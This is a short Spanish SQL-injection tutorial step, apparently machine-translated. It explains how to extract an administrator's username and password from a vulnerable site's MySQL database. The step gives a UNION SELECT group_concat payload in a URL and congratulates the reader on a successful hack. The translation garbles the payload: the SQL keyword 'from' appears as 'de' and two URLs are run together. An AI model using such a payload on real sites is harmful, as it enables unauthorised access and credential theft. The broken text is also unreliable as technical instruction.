Paso 9: Encontrar del administrador nombre de usuario y contraseña - parte 2
Una vez que ha escrito en * Username_Column *, 0x20616e6420, * Password_Column * entre los soportes de group_concat ,
Ahora tenemos que añadir el nombre de tabla de Host .
Después el comando de , escriba su nombre de la tabla Admin que tenes en el paso 5. (En mi caso, tabla Admin mi nombre es nifty_admin)
Asegúrese de escribir el nombre de la tabla Admin en Inglés,No Hexadecimal caracteres.
Ahora la dirección Web completa finalmente se verá así:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 de * Admin_Table_Name *
Hacer seguro reemplazar * Admin_Table_Name * con el nombre de la tabla Admin junto con * Username_Column *, * Password_Column *
Si se pulsa Intro, verás nombre de usuario y contraseña como la foto de arriba, Nota: El nombre de usuario y contraseña que ves arriba son anticuadas, no trabajan.
¡ Felicidades ! Has hackeado con éxito en base de datos MySQL!